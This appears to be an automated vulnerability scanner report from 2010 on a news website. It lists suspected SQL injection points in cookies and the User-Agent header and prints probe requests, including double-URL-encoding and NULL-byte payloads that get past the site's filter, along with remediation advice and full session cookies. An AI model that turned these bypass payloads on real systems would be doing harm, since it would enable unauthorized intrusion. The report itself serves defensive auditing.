Cookie: currBrandCheck=mngimercurynews; UserType=Browser; JSESSIONID=4TAEQ3DHPIXDGCUUCBWCFFA; __g_c=w%3A1%7Cb%3A4%7Cc%3A280449122501380%7Cd%3A1%7Ca%3A0%7Ce%3A0.01%7Cf%3A0; s_sq=%5B%5BB%5D%5D; UserID=CG3BTKSGEWDI4CUUCBWCFFI; fPage=false; u=COOKIE_NAME%3Du%3B280449122501380_1_0.01_0_5_1292194310310%3Dundefined%3BuserIdChange%3Dtrue%3BuserId%3DCG3BTKSGEWDI4CUUCBWCFFI%3BconPage%3Dfalse%3BaaPage%3Dfalse%3BloginConPage%3Dfalse%3BfPage%3Dfalse%3BvType%3D2%3BinitRegType%3DVoluntary%3B; s_cc=true; __g_u=280449122501380_1_0.01_0_5_1292194310310; Zvents=hikxwtryu4; fcspersistslider1=1; __qca=P0-326766520-1291762315669;
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>302 Found</title> </head><body> <h1>Found</h1> <p>The document has moved <a href="http://www.mercurynews.com/warriors''/ci_167865 ...[SNIP]...
The User-Agent HTTP header appears to be vulnerable to SQL injection attacks. A single quote was submitted in the User-Agent HTTP header, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of the User-Agent HTTP header as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request 1
GET /warriors/ci_16792619 HTTP/1.1
Host: www.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)%2527
Connection: close
Cookie: currBrandCheck=mngimercurynews; UserType=Browser; JSESSIONID=4TAEQ3DHPIXDGCUUCBWCFFA; __g_c=w%3A1%7Cb%3A4%7Cc%3A280449122501380%7Cd%3A1%7Ca%3A0%7Ce%3A0.01%7Cf%3A0; s_sq=%5B%5BB%5D%5D; UserID=CG3BTKSGEWDI4CUUCBWCFFI; fPage=false; u=COOKIE_NAME%3Du%3B280449122501380_1_0.01_0_5_1292194310310%3Dundefined%3BuserIdChange%3Dtrue%3BuserId%3DCG3BTKSGEWDI4CUUCBWCFFI%3BconPage%3Dfalse%3BaaPage%3Dfalse%3BloginConPage%3Dfalse%3BfPage%3Dfalse%3BvType%3D2%3BinitRegType%3DVoluntary%3B; s_cc=true; __g_u=280449122501380_1_0.01_0_5_1292194310310; Zvents=hikxwtryu4; fcspersistslider1=1; __qca=P0-326766520-1291762315669;
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"><html><head><META NAME='description' CONTENT='Warriors at DallasTipoff: 5:30 p.m., American Airlines CenterTV/Radio: CSNBA; NBA-TV; 1050- ...[SNIP]... g name, server, and channel on the next lines. */
s.pageName=FriendlyName;
s.channel="Home"; // Same as prop1
s.server="";// Blank
s.pageType=""; // Error pages ONLY
s.prop1="D=g";
s.prop2='D=ch+" / "+c43'; // Sub section 1
s.p ...[SNIP]...
Request 2
GET /warriors/ci_16792619 HTTP/1.1
Host: www.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)%2527%2527
Connection: close
Cookie: currBrandCheck=mngimercurynews; UserType=Browser; JSESSIONID=4TAEQ3DHPIXDGCUUCBWCFFA; __g_c=w%3A1%7Cb%3A4%7Cc%3A280449122501380%7Cd%3A1%7Ca%3A0%7Ce%3A0.01%7Cf%3A0; s_sq=%5B%5BB%5D%5D; UserID=CG3BTKSGEWDI4CUUCBWCFFI; fPage=false; u=COOKIE_NAME%3Du%3B280449122501380_1_0.01_0_5_1292194310310%3Dundefined%3BuserIdChange%3Dtrue%3BuserId%3DCG3BTKSGEWDI4CUUCBWCFFI%3BconPage%3Dfalse%3BaaPage%3Dfalse%3BloginConPage%3Dfalse%3BfPage%3Dfalse%3BvType%3D2%3BinitRegType%3DVoluntary%3B; s_cc=true; __g_u=280449122501380_1_0.01_0_5_1292194310310; Zvents=hikxwtryu4; fcspersistslider1=1; __qca=P0-326766520-1291762315669;
Response 2 (redirected)
HTTP/1.1 302 Moved Temporarily
Server: Apache/2.0.52 (Red Hat)
Location: https://secure.passport.mnginteractive.com/mngi/servletDispatch/ErightsPassportServlet.dyn?url=http://www.mercurynews.com/warriors/ci_16792619?nclick_check=1&forced=true
Vary: Accept-encoding
Expires: Wed, 08 Dec 2010 06:43:48 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Wed, 08 Dec 2010 06:43:48 GMT
Connection: close
Connection: Transfer-Encoding
Content-Type: text/html;charset=UTF-8
Content-Length: 443
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>302 Found</title> </head><body> <h1>Found</h1> <p>The document has moved <a href="https://secure.passport.mnginteractive.com/mngi ...[SNIP]...
The UserID cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the UserID cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
Request 1
GET /warriors/ci_16792619 HTTP/1.1
Host: www.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: currBrandCheck=mngimercurynews; UserType=Browser; JSESSIONID=4TAEQ3DHPIXDGCUUCBWCFFA; __g_c=w%3A1%7Cb%3A4%7Cc%3A280449122501380%7Cd%3A1%7Ca%3A0%7Ce%3A0.01%7Cf%3A0; s_sq=%5B%5BB%5D%5D; UserID=CG3BTKSGEWDI4CUUCBWCFFI'; fPage=false; u=COOKIE_NAME%3Du%3B280449122501380_1_0.01_0_5_1292194310310%3Dundefined%3BuserIdChange%3Dtrue%3BuserId%3DCG3BTKSGEWDI4CUUCBWCFFI%3BconPage%3Dfalse%3BaaPage%3Dfalse%3BloginConPage%3Dfalse%3BfPage%3Dfalse%3BvType%3D2%3BinitRegType%3DVoluntary%3B; s_cc=true; __g_u=280449122501380_1_0.01_0_5_1292194310310; Zvents=hikxwtryu4; fcspersistslider1=1; __qca=P0-326766520-1291762315669;
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"><html><head><META NAME='description' CONTENT='Warriors at DallasTipoff: 5:30 p.m., American Airlines CenterTV/Radio: CSNBA; NBA-TV; 1050- ...[SNIP]... g name, server, and channel on the next lines. */
s.pageName=FriendlyName;
s.channel="Home"; // Same as prop1
s.server="";// Blank
s.pageType=""; // Error pages ONLY
s.prop1="D=g";
s.prop2='D=ch+" / "+c43'; // Sub section 1
s.p ...[SNIP]...
Request 2
GET /warriors/ci_16792619 HTTP/1.1
Host: www.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: currBrandCheck=mngimercurynews; UserType=Browser; JSESSIONID=4TAEQ3DHPIXDGCUUCBWCFFA; __g_c=w%3A1%7Cb%3A4%7Cc%3A280449122501380%7Cd%3A1%7Ca%3A0%7Ce%3A0.01%7Cf%3A0; s_sq=%5B%5BB%5D%5D; UserID=CG3BTKSGEWDI4CUUCBWCFFI''; fPage=false; u=COOKIE_NAME%3Du%3B280449122501380_1_0.01_0_5_1292194310310%3Dundefined%3BuserIdChange%3Dtrue%3BuserId%3DCG3BTKSGEWDI4CUUCBWCFFI%3BconPage%3Dfalse%3BaaPage%3Dfalse%3BloginConPage%3Dfalse%3BfPage%3Dfalse%3BvType%3D2%3BinitRegType%3DVoluntary%3B; s_cc=true; __g_u=280449122501380_1_0.01_0_5_1292194310310; Zvents=hikxwtryu4; fcspersistslider1=1; __qca=P0-326766520-1291762315669;
Response 2 (redirected)
HTTP/1.1 302 Moved Temporarily
Server: Apache/2.0.52 (Red Hat)
Location: https://secure.passport.mnginteractive.com/mngi/servletDispatch/ErightsPassportServlet.dyn?url=http://www.mercurynews.com/warriors/ci_16792619?nclick_check=1&forced=true
Vary: Accept-encoding
Expires: Wed, 08 Dec 2010 06:42:10 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Wed, 08 Dec 2010 06:42:10 GMT
Connection: close
Connection: Transfer-Encoding
Content-Type: text/html;charset=UTF-8
Content-Length: 443
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>302 Found</title> </head><body> <h1>Found</h1> <p>The document has moved <a href="https://secure.passport.mnginteractive.com/mngi ...[SNIP]...
The UserType cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the UserType cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.
Remediation detail
NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
Request 1
GET /warriors/ci_16792619?source=rss HTTP/1.1
Host: www.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: currBrandCheck=mngimercurynews; UserType=Browser%00'; JSESSIONID=4TAEQ3DHPIXDGCUUCBWCFFA; __g_c=w%3A1%7Cb%3A4%7Cc%3A280449122501380%7Cd%3A1%7Ca%3A0%7Ce%3A0.01%7Cf%3A0; s_sq=%5B%5BB%5D%5D; UserID=CG3BTKSGEWDI4CUUCBWCFFI; fPage=false; u=COOKIE_NAME%3Du%3B280449122501380_1_0.01_0_5_1292194310310%3Dundefined%3BuserIdChange%3Dtrue%3BuserId%3DCG3BTKSGEWDI4CUUCBWCFFI%3BconPage%3Dfalse%3BaaPage%3Dfalse%3BloginConPage%3Dfalse%3BfPage%3Dfalse%3BvType%3D2%3BinitRegType%3DVoluntary%3B; s_cc=true; __g_u=280449122501380_1_0.01_0_5_1292194310310; Zvents=hikxwtryu4; fcspersistslider1=1; __qca=P0-326766520-1291762315669;
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"><html><head><META NAME='description' CONTENT='Warriors at DallasTipoff: 5:30 p.m., American Airlines CenterTV/Radio: CSNBA; NBA-TV; 1050- ...[SNIP]... g name, server, and channel on the next lines. */
s.pageName=FriendlyName;
s.channel="Home"; // Same as prop1
s.server="";// Blank
s.pageType=""; // Error pages ONLY
s.prop1="D=g";
s.prop2='D=ch+" / "+c43'; // Sub section 1
s.p ...[SNIP]...
Request 2
GET /warriors/ci_16792619?source=rss HTTP/1.1
Host: www.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: currBrandCheck=mngimercurynews; UserType=Browser%00''; JSESSIONID=4TAEQ3DHPIXDGCUUCBWCFFA; __g_c=w%3A1%7Cb%3A4%7Cc%3A280449122501380%7Cd%3A1%7Ca%3A0%7Ce%3A0.01%7Cf%3A0; s_sq=%5B%5BB%5D%5D; UserID=CG3BTKSGEWDI4CUUCBWCFFI; fPage=false; u=COOKIE_NAME%3Du%3B280449122501380_1_0.01_0_5_1292194310310%3Dundefined%3BuserIdChange%3Dtrue%3BuserId%3DCG3BTKSGEWDI4CUUCBWCFFI%3BconPage%3Dfalse%3BaaPage%3Dfalse%3BloginConPage%3Dfalse%3BfPage%3Dfalse%3BvType%3D2%3BinitRegType%3DVoluntary%3B; s_cc=true; __g_u=280449122501380_1_0.01_0_5_1292194310310; Zvents=hikxwtryu4; fcspersistslider1=1; __qca=P0-326766520-1291762315669;
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"><html><head><META NAME='description' CONTENT='Warriors at DallasTipoff: 5:30 p.m., American Airlines CenterTV/Radio: CSNBA; NBA-TV; 1050- ...[SNIP]...
The UserType cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the UserType cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of the UserType cookie as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request 1
GET /warriors/ci_16792619 HTTP/1.1
Host: www.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: currBrandCheck=mngimercurynews; UserType=Browser%2527; JSESSIONID=4TAEQ3DHPIXDGCUUCBWCFFA; __g_c=w%3A1%7Cb%3A4%7Cc%3A280449122501380%7Cd%3A1%7Ca%3A0%7Ce%3A0.01%7Cf%3A0; s_sq=%5B%5BB%5D%5D; UserID=CG3BTKSGEWDI4CUUCBWCFFI; fPage=false; u=COOKIE_NAME%3Du%3B280449122501380_1_0.01_0_5_1292194310310%3Dundefined%3BuserIdChange%3Dtrue%3BuserId%3DCG3BTKSGEWDI4CUUCBWCFFI%3BconPage%3Dfalse%3BaaPage%3Dfalse%3BloginConPage%3Dfalse%3BfPage%3Dfalse%3BvType%3D2%3BinitRegType%3DVoluntary%3B; s_cc=true; __g_u=280449122501380_1_0.01_0_5_1292194310310; Zvents=hikxwtryu4; fcspersistslider1=1; __qca=P0-326766520-1291762315669;
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"><html><head><META NAME='description' CONTENT='Warriors at DallasTipoff: 5:30 p.m., American Airlines CenterTV/Radio: CSNBA; NBA-TV; 1050- ...[SNIP]... g name, server, and channel on the next lines. */
s.pageName=FriendlyName;
s.channel="Home"; // Same as prop1
s.server="";// Blank
s.pageType=""; // Error pages ONLY
s.prop1="D=g";
s.prop2='D=ch+" / "+c43'; // Sub section 1
s.p ...[SNIP]...
Request 2
GET /warriors/ci_16792619 HTTP/1.1
Host: www.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: currBrandCheck=mngimercurynews; UserType=Browser%2527%2527; JSESSIONID=4TAEQ3DHPIXDGCUUCBWCFFA; __g_c=w%3A1%7Cb%3A4%7Cc%3A280449122501380%7Cd%3A1%7Ca%3A0%7Ce%3A0.01%7Cf%3A0; s_sq=%5B%5BB%5D%5D; UserID=CG3BTKSGEWDI4CUUCBWCFFI; fPage=false; u=COOKIE_NAME%3Du%3B280449122501380_1_0.01_0_5_1292194310310%3Dundefined%3BuserIdChange%3Dtrue%3BuserId%3DCG3BTKSGEWDI4CUUCBWCFFI%3BconPage%3Dfalse%3BaaPage%3Dfalse%3BloginConPage%3Dfalse%3BfPage%3Dfalse%3BvType%3D2%3BinitRegType%3DVoluntary%3B; s_cc=true; __g_u=280449122501380_1_0.01_0_5_1292194310310; Zvents=hikxwtryu4; fcspersistslider1=1; __qca=P0-326766520-1291762315669;
Response 2 (redirected)
HTTP/1.1 302 Moved Temporarily
Server: Apache/2.0.52 (Red Hat)
Location: https://secure.passport.mnginteractive.com/mngi/servletDispatch/ErightsPassportServlet.dyn?url=http://www.mercurynews.com/warriors/ci_16792619?nclick_check=1&forced=true
Vary: Accept-encoding
Expires: Wed, 08 Dec 2010 06:41:43 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Wed, 08 Dec 2010 06:41:43 GMT
Connection: close
Connection: Transfer-Encoding
Content-Type: text/html;charset=UTF-8
Content-Length: 443
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>302 Found</title> </head><body> <h1>Found</h1> <p>The document has moved <a href="https://secure.passport.mnginteractive.com/mngi ...[SNIP]...
The __g_c cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the __g_c cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of the __g_c cookie as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request 1
GET /warriors/ci_16792619?source=rss HTTP/1.1
Host: www.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: currBrandCheck=mngimercurynews; UserType=Browser; JSESSIONID=4TAEQ3DHPIXDGCUUCBWCFFA; __g_c=w%3A1%7Cb%3A4%7Cc%3A280449122501380%7Cd%3A1%7Ca%3A0%7Ce%3A0.01%7Cf%3A0%2527; s_sq=%5B%5BB%5D%5D; UserID=CG3BTKSGEWDI4CUUCBWCFFI; fPage=false; u=COOKIE_NAME%3Du%3B280449122501380_1_0.01_0_5_1292194310310%3Dundefined%3BuserIdChange%3Dtrue%3BuserId%3DCG3BTKSGEWDI4CUUCBWCFFI%3BconPage%3Dfalse%3BaaPage%3Dfalse%3BloginConPage%3Dfalse%3BfPage%3Dfalse%3BvType%3D2%3BinitRegType%3DVoluntary%3B; s_cc=true; __g_u=280449122501380_1_0.01_0_5_1292194310310; Zvents=hikxwtryu4; fcspersistslider1=1; __qca=P0-326766520-1291762315669;
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"><html><head><META NAME='description' CONTENT='Warriors at DallasTipoff: 5:30 p.m., American Airlines CenterTV/Radio: CSNBA; NBA-TV; 1050- ...[SNIP]... g name, server, and channel on the next lines. */
s.pageName=FriendlyName;
s.channel="Home"; // Same as prop1
s.server="";// Blank
s.pageType=""; // Error pages ONLY
s.prop1="D=g";
s.prop2='D=ch+" / "+c43'; // Sub section 1
s.p ...[SNIP]...
Request 2
GET /warriors/ci_16792619?source=rss HTTP/1.1
Host: www.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: currBrandCheck=mngimercurynews; UserType=Browser; JSESSIONID=4TAEQ3DHPIXDGCUUCBWCFFA; __g_c=w%3A1%7Cb%3A4%7Cc%3A280449122501380%7Cd%3A1%7Ca%3A0%7Ce%3A0.01%7Cf%3A0%2527%2527; s_sq=%5B%5BB%5D%5D; UserID=CG3BTKSGEWDI4CUUCBWCFFI; fPage=false; u=COOKIE_NAME%3Du%3B280449122501380_1_0.01_0_5_1292194310310%3Dundefined%3BuserIdChange%3Dtrue%3BuserId%3DCG3BTKSGEWDI4CUUCBWCFFI%3BconPage%3Dfalse%3BaaPage%3Dfalse%3BloginConPage%3Dfalse%3BfPage%3Dfalse%3BvType%3D2%3BinitRegType%3DVoluntary%3B; s_cc=true; __g_u=280449122501380_1_0.01_0_5_1292194310310; Zvents=hikxwtryu4; fcspersistslider1=1; __qca=P0-326766520-1291762315669;
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"><html><head><META NAME='description' CONTENT='Warriors at DallasTipoff: 5:30 p.m., American Airlines CenterTV/Radio: CSNBA; NBA-TV; 1050- ...[SNIP]...
The __g_u cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the __g_u cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.
Remediation detail
NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
Request 1
GET /warriors/ci_16792619?source=rss HTTP/1.1
Host: www.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: currBrandCheck=mngimercurynews; UserType=Browser; JSESSIONID=4TAEQ3DHPIXDGCUUCBWCFFA; __g_c=w%3A1%7Cb%3A4%7Cc%3A280449122501380%7Cd%3A1%7Ca%3A0%7Ce%3A0.01%7Cf%3A0; s_sq=%5B%5BB%5D%5D; UserID=CG3BTKSGEWDI4CUUCBWCFFI; fPage=false; u=COOKIE_NAME%3Du%3B280449122501380_1_0.01_0_5_1292194310310%3Dundefined%3BuserIdChange%3Dtrue%3BuserId%3DCG3BTKSGEWDI4CUUCBWCFFI%3BconPage%3Dfalse%3BaaPage%3Dfalse%3BloginConPage%3Dfalse%3BfPage%3Dfalse%3BvType%3D2%3BinitRegType%3DVoluntary%3B; s_cc=true; __g_u=280449122501380_1_0.01_0_5_1292194310310%00'; Zvents=hikxwtryu4; fcspersistslider1=1; __qca=P0-326766520-1291762315669;
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"><html><head><META NAME='description' CONTENT='Warriors at DallasTipoff: 5:30 p.m., American Airlines CenterTV/Radio: CSNBA; NBA-TV; 1050- ...[SNIP]... g name, server, and channel on the next lines. */
s.pageName=FriendlyName;
s.channel="Home"; // Same as prop1
s.server="";// Blank
s.pageType=""; // Error pages ONLY
s.prop1="D=g";
s.prop2='D=ch+" / "+c43'; // Sub section 1
s.p ...[SNIP]...
Request 2
GET /warriors/ci_16792619?source=rss HTTP/1.1
Host: www.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: currBrandCheck=mngimercurynews; UserType=Browser; JSESSIONID=4TAEQ3DHPIXDGCUUCBWCFFA; __g_c=w%3A1%7Cb%3A4%7Cc%3A280449122501380%7Cd%3A1%7Ca%3A0%7Ce%3A0.01%7Cf%3A0; s_sq=%5B%5BB%5D%5D; UserID=CG3BTKSGEWDI4CUUCBWCFFI; fPage=false; u=COOKIE_NAME%3Du%3B280449122501380_1_0.01_0_5_1292194310310%3Dundefined%3BuserIdChange%3Dtrue%3BuserId%3DCG3BTKSGEWDI4CUUCBWCFFI%3BconPage%3Dfalse%3BaaPage%3Dfalse%3BloginConPage%3Dfalse%3BfPage%3Dfalse%3BvType%3D2%3BinitRegType%3DVoluntary%3B; s_cc=true; __g_u=280449122501380_1_0.01_0_5_1292194310310%00''; Zvents=hikxwtryu4; fcspersistslider1=1; __qca=P0-326766520-1291762315669;
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"><html><head><META NAME='description' CONTENT='Warriors at DallasTipoff: 5:30 p.m., American Airlines CenterTV/Radio: CSNBA; NBA-TV; 1050- ...[SNIP]...
The UserID cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the UserID cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
Request 1
GET /warriors/ci_16794092?source=rss HTTP/1.1
Host: www.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: currBrandCheck=mngimercurynews; UserType=Browser; JSESSIONID=4TAEQ3DHPIXDGCUUCBWCFFA; __g_c=w%3A1%7Cb%3A4%7Cc%3A280449122501380%7Cd%3A1%7Ca%3A0%7Ce%3A0.01%7Cf%3A0; s_sq=%5B%5BB%5D%5D; UserID=CG3BTKSGEWDI4CUUCBWCFFI'; fPage=false; u=COOKIE_NAME%3Du%3B280449122501380_1_0.01_0_5_1292194310310%3Dundefined%3BuserIdChange%3Dtrue%3BuserId%3DCG3BTKSGEWDI4CUUCBWCFFI%3BconPage%3Dfalse%3BaaPage%3Dfalse%3BloginConPage%3Dfalse%3BfPage%3Dfalse%3BvType%3D2%3BinitRegType%3DVoluntary%3B; s_cc=true; __g_u=280449122501380_1_0.01_0_5_1292194310310; Zvents=hikxwtryu4; fcspersistslider1=1; __qca=P0-326766520-1291762315669;
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"><html><head><META NAME='description' CONTENT='After winning six of their first eight games, the Warriors have found themselves struggling ...[SNIP]... g name, server, and channel on the next lines. */
s.pageName=FriendlyName;
s.channel="Home"; // Same as prop1
s.server="";// Blank
s.pageType=""; // Error pages ONLY
s.prop1="D=g";
s.prop2='D=ch+" / "+c43'; // Sub section 1
s.p ...[SNIP]...
Request 2
GET /warriors/ci_16794092?source=rss HTTP/1.1
Host: www.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: currBrandCheck=mngimercurynews; UserType=Browser; JSESSIONID=4TAEQ3DHPIXDGCUUCBWCFFA; __g_c=w%3A1%7Cb%3A4%7Cc%3A280449122501380%7Cd%3A1%7Ca%3A0%7Ce%3A0.01%7Cf%3A0; s_sq=%5B%5BB%5D%5D; UserID=CG3BTKSGEWDI4CUUCBWCFFI''; fPage=false; u=COOKIE_NAME%3Du%3B280449122501380_1_0.01_0_5_1292194310310%3Dundefined%3BuserIdChange%3Dtrue%3BuserId%3DCG3BTKSGEWDI4CUUCBWCFFI%3BconPage%3Dfalse%3BaaPage%3Dfalse%3BloginConPage%3Dfalse%3BfPage%3Dfalse%3BvType%3D2%3BinitRegType%3DVoluntary%3B; s_cc=true; __g_u=280449122501380_1_0.01_0_5_1292194310310; Zvents=hikxwtryu4; fcspersistslider1=1; __qca=P0-326766520-1291762315669;
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"><html><head><META NAME='description' CONTENT='After winning six of their first eight games, the Warriors have found themselves struggling ...[SNIP]...
The Zvents cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the Zvents cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
Request 1
GET /warriors/ci_16794092?source=rss HTTP/1.1
Host: www.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: currBrandCheck=mngimercurynews; UserType=Browser; JSESSIONID=4TAEQ3DHPIXDGCUUCBWCFFA; __g_c=w%3A1%7Cb%3A4%7Cc%3A280449122501380%7Cd%3A1%7Ca%3A0%7Ce%3A0.01%7Cf%3A0; s_sq=%5B%5BB%5D%5D; UserID=CG3BTKSGEWDI4CUUCBWCFFI; fPage=false; u=COOKIE_NAME%3Du%3B280449122501380_1_0.01_0_5_1292194310310%3Dundefined%3BuserIdChange%3Dtrue%3BuserId%3DCG3BTKSGEWDI4CUUCBWCFFI%3BconPage%3Dfalse%3BaaPage%3Dfalse%3BloginConPage%3Dfalse%3BfPage%3Dfalse%3BvType%3D2%3BinitRegType%3DVoluntary%3B; s_cc=true; __g_u=280449122501380_1_0.01_0_5_1292194310310; Zvents=hikxwtryu4'; fcspersistslider1=1; __qca=P0-326766520-1291762315669;
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"><html><head><META NAME='description' CONTENT='After winning six of their first eight games, the Warriors have found themselves struggling ...[SNIP]... g name, server, and channel on the next lines. */
s.pageName=FriendlyName;
s.channel="Home"; // Same as prop1
s.server="";// Blank
s.pageType=""; // Error pages ONLY
s.prop1="D=g";
s.prop2='D=ch+" / "+c43'; // Sub section 1
s.p ...[SNIP]...
Request 2
GET /warriors/ci_16794092?source=rss HTTP/1.1
Host: www.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: currBrandCheck=mngimercurynews; UserType=Browser; JSESSIONID=4TAEQ3DHPIXDGCUUCBWCFFA; __g_c=w%3A1%7Cb%3A4%7Cc%3A280449122501380%7Cd%3A1%7Ca%3A0%7Ce%3A0.01%7Cf%3A0; s_sq=%5B%5BB%5D%5D; UserID=CG3BTKSGEWDI4CUUCBWCFFI; fPage=false; u=COOKIE_NAME%3Du%3B280449122501380_1_0.01_0_5_1292194310310%3Dundefined%3BuserIdChange%3Dtrue%3BuserId%3DCG3BTKSGEWDI4CUUCBWCFFI%3BconPage%3Dfalse%3BaaPage%3Dfalse%3BloginConPage%3Dfalse%3BfPage%3Dfalse%3BvType%3D2%3BinitRegType%3DVoluntary%3B; s_cc=true; __g_u=280449122501380_1_0.01_0_5_1292194310310; Zvents=hikxwtryu4''; fcspersistslider1=1; __qca=P0-326766520-1291762315669;
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"><html><head><META NAME='description' CONTENT='After winning six of their first eight games, the Warriors have found themselves struggling ...[SNIP]...
The fPage cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the fPage cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character. The web server decodes %2527 once to %27, which passes a filter that looks for a literal quote, and the application's own second decode then turns %27 into ' before the value reaches the query.
Remediation detail
